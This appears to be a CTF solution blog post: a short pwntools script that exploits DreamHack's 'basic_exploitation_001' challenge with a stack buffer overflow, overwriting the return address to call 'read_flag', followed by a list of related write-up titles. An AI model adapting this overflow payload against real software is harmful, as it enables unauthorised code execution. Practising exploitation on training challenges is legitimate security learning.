#!/usr/bin/python
from pwn import *
#p = process("./basic_exploitation_001")
p = remote("host1.dreamhack.games", 8239)
elf = ELF("./basic_exploitation_001")
read_flag = elf.symbols['read_flag']
p.sendline('A'*(0x80+4) + p32(read_flag))
p.interactive()
[DreamHack] basic_exploitation_003 (0) | 2020.05.31 |
---|---|
[DreamHack] basic_exploitation_002 (0) | 2020.05.31 |
[DreamHack] basic_rop_x86 (0) | 2020.05.31 |
[DreamHack] basic_rop_x64 (0) | 2020.05.31 |
[DreamHack] oneshot (2) | 2020.05.31 |